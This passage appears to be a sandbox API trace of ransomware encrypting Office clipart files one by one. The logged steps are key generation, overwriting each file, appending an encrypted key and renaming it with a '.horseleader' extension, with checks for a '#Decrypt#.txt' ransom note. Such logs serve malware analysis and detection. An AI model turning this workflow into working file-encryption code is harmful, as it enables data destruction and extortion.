ftLastAccessTime.dwLowDateTime=0x5f47ba90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4c365a00, ftLastWriteTime.dwHighDateTime=0x1bd4f6a, nFileSizeHigh=0x0, nFileSizeLow=0x34cb, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD10890_.GIF", cAlternateFileName="")) returned 1 [0253.264] lstrcmpiW (lpString1="BD10890_.GIF", lpString2="Windows") returned -1 [0253.264] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 67 [0253.264] StrStrIW (lpFirst="BD10890_.GIF", lpSrch=".horseleader") returned 0x0 [0253.264] lstrcmpW (lpString1="BD10890_.GIF", lpString2="#Decrypt#.txt") returned 1 [0253.264] lstrcmpW (lpString1="BD10890_.GIF", lpString2="_uninstalling_.png") returned 1 [0253.264] lstrlenW (lpString=".testttjffg") returned 11 [0253.264] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF", lpSrch=".testttjffg") returned 0x0 [0253.264] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.264] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.265] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.265] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 67 [0253.265] StrStrW (lpFirst="BD10890_.GIF", lpSrch=".txt") returned 0x0 [0253.265] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=13515) returned 1 [0253.265] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x34cb, lpOverlapped=0x0) returned 1 [0253.268] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffcb35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.268] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x34cb, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x34cb, lpOverlapped=0x0) returned 1 [0253.268] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.268] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.268] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.268] CloseHandle (hObject=0x158) returned 1 [0253.268] GetProcessHeap () returned 0x780000 [0253.268] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.268] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF.horseleader") returned 79 [0253.268] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10890_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10890_.gif.horseleader")) returned 1 [0253.269] GetProcessHeap () returned 0x780000 [0253.269] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.269] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93701b00, ftCreationTime.dwHighDateTime=0x1bd4f69, ftLastAccessTime.dwLowDateTime=0x517da370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x93701b00, ftLastWriteTime.dwHighDateTime=0x1bd4f69, nFileSizeHigh=0x0, nFileSizeLow=0x4edd, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD10972_.GIF", cAlternateFileName="")) returned 1 [0253.269] lstrcmpiW (lpString1="BD10972_.GIF", lpString2="Windows") returned -1 [0253.269] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 67 [0253.269] StrStrIW (lpFirst="BD10972_.GIF", lpSrch=".horseleader") returned 0x0 [0253.269] lstrcmpW (lpString1="BD10972_.GIF", lpString2="#Decrypt#.txt") returned 1 [0253.269] lstrcmpW (lpString1="BD10972_.GIF", lpString2="_uninstalling_.png") returned 1 [0253.269] lstrlenW (lpString=".testttjffg") returned 11 [0253.269] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF", lpSrch=".testttjffg") returned 0x0 [0253.270] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.270] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.270] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.271] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 67 [0253.271] StrStrW (lpFirst="BD10972_.GIF", lpSrch=".txt") returned 0x0 [0253.271] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=20189) returned 1 [0253.271] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4edd, lpOverlapped=0x0) returned 1 [0253.273] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb123, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.273] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4edd, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4edd, lpOverlapped=0x0) returned 1 [0253.273] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.274] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.274] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.274] CloseHandle (hObject=0x158) returned 1 [0253.274] GetProcessHeap () returned 0x780000 [0253.274] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.274] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF.horseleader") returned 79 [0253.274] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD10972_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd10972_.gif.horseleader")) returned 1 [0253.275] GetProcessHeap () returned 0x780000 [0253.275] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.275] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6557800, ftCreationTime.dwHighDateTime=0x1bd4d57, ftLastAccessTime.dwLowDateTime=0x5190ae70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6557800, ftLastWriteTime.dwHighDateTime=0x1bd4d57, nFileSizeHigh=0x0, nFileSizeLow=0x4fe6, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD19563_.GIF", cAlternateFileName="")) returned 1 [0253.275] lstrcmpiW (lpString1="BD19563_.GIF", lpString2="Windows") returned -1 [0253.275] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 67 [0253.275] StrStrIW (lpFirst="BD19563_.GIF", lpSrch=".horseleader") returned 0x0 [0253.275] lstrcmpW (lpString1="BD19563_.GIF", lpString2="#Decrypt#.txt") returned 1 [0253.275] lstrcmpW (lpString1="BD19563_.GIF", lpString2="_uninstalling_.png") returned 1 [0253.276] lstrlenW (lpString=".testttjffg") returned 11 [0253.276] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF", lpSrch=".testttjffg") returned 0x0 [0253.276] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.276] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.276] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.277] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF") returned 67 [0253.277] StrStrW (lpFirst="BD19563_.GIF", lpSrch=".txt") returned 0x0 [0253.277] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=20454) returned 1 [0253.277] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4fe6, lpOverlapped=0x0) returned 1 [0253.279] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb01a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.279] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4fe6, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4fe6, lpOverlapped=0x0) returned 1 [0253.279] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.279] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.280] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.280] CloseHandle (hObject=0x158) returned 1 [0253.280] GetProcessHeap () returned 0x780000 [0253.280] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.280] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF.horseleader") returned 79 [0253.280] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19563_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19563_.gif.horseleader")) returned 1 [0253.281] GetProcessHeap () returned 0x780000 [0253.281] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.281] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4f48c00, ftCreationTime.dwHighDateTime=0x1bd4d56, ftLastAccessTime.dwLowDateTime=0x5f586430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe4f48c00, ftLastWriteTime.dwHighDateTime=0x1bd4d56, nFileSizeHigh=0x0, nFileSizeLow=0x3d75, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD19582_.GIF", cAlternateFileName="")) returned 1 [0253.281] lstrcmpiW (lpString1="BD19582_.GIF", lpString2="Windows") returned -1 [0253.281] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 67 [0253.281] StrStrIW (lpFirst="BD19582_.GIF", lpSrch=".horseleader") returned 0x0 [0253.281] lstrcmpW (lpString1="BD19582_.GIF", lpString2="#Decrypt#.txt") returned 1 [0253.281] lstrcmpW (lpString1="BD19582_.GIF", lpString2="_uninstalling_.png") returned 1 [0253.281] lstrlenW (lpString=".testttjffg") returned 11 [0253.281] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF", lpSrch=".testttjffg") returned 0x0 [0253.281] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.282] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.282] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.282] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 67 [0253.282] StrStrW (lpFirst="BD19582_.GIF", lpSrch=".txt") returned 0x0 [0253.282] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=15733) returned 1 [0253.282] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3d75, lpOverlapped=0x0) returned 1 [0253.285] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc28b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.285] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3d75, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3d75, lpOverlapped=0x0) returned 1 [0253.285] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.285] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.285] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.285] CloseHandle (hObject=0x158) returned 1 [0253.285] GetProcessHeap () returned 0x780000 [0253.286] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.286] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF.horseleader") returned 79 [0253.286] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19582_.gif.horseleader")) returned 1 [0253.287] GetProcessHeap () returned 0x780000 [0253.287] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.287] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c6cc00, ftCreationTime.dwHighDateTime=0x1bd4d5a, ftLastAccessTime.dwLowDateTime=0x5190ae70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc4c6cc00, ftLastWriteTime.dwHighDateTime=0x1bd4d5a, nFileSizeHigh=0x0, nFileSizeLow=0x32b6, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD19695_.WMF", cAlternateFileName="")) returned 1 [0253.287] lstrcmpiW (lpString1="BD19695_.WMF", lpString2="Windows") returned -1 [0253.287] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 67 [0253.287] StrStrIW (lpFirst="BD19695_.WMF", lpSrch=".horseleader") returned 0x0 [0253.287] lstrcmpW (lpString1="BD19695_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.287] lstrcmpW (lpString1="BD19695_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.287] lstrlenW (lpString=".testttjffg") returned 11 [0253.287] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.287] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.287] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.287] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.288] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 67 [0253.288] StrStrW (lpFirst="BD19695_.WMF", lpSrch=".txt") returned 0x0 [0253.288] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=12982) returned 1 [0253.288] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x32b6, lpOverlapped=0x0) returned 1 [0253.290] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffcd4a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.290] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x32b6, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x32b6, lpOverlapped=0x0) returned 1 [0253.291] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.291] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.291] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.291] CloseHandle (hObject=0x158) returned 1 [0253.291] GetProcessHeap () returned 0x780000 [0253.291] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.291] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF.horseleader") returned 79 [0253.292] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf.horseleader")) returned 1 [0253.293] GetProcessHeap () returned 0x780000 [0253.293] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.293] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee332800, ftCreationTime.dwHighDateTime=0x1bd4d59, ftLastAccessTime.dwLowDateTime=0x5f586430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xee332800, ftLastWriteTime.dwHighDateTime=0x1bd4d59, nFileSizeHigh=0x0, nFileSizeLow=0x25ee, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD19827_.WMF", cAlternateFileName="")) returned 1 [0253.293] lstrcmpiW (lpString1="BD19827_.WMF", lpString2="Windows") returned -1 [0253.293] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 67 [0253.293] StrStrIW (lpFirst="BD19827_.WMF", lpSrch=".horseleader") returned 0x0 [0253.293] lstrcmpW (lpString1="BD19827_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.293] lstrcmpW (lpString1="BD19827_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.294] lstrlenW (lpString=".testttjffg") returned 11 [0253.294] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.294] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.294] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.294] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.294] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 67 [0253.294] StrStrW (lpFirst="BD19827_.WMF", lpSrch=".txt") returned 0x0 [0253.294] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=9710) returned 1 [0253.294] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x25ee, lpOverlapped=0x0) returned 1 [0253.332] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffda12, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.332] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x25ee, lpNumberOfBytesWritten=0x32aedf4, 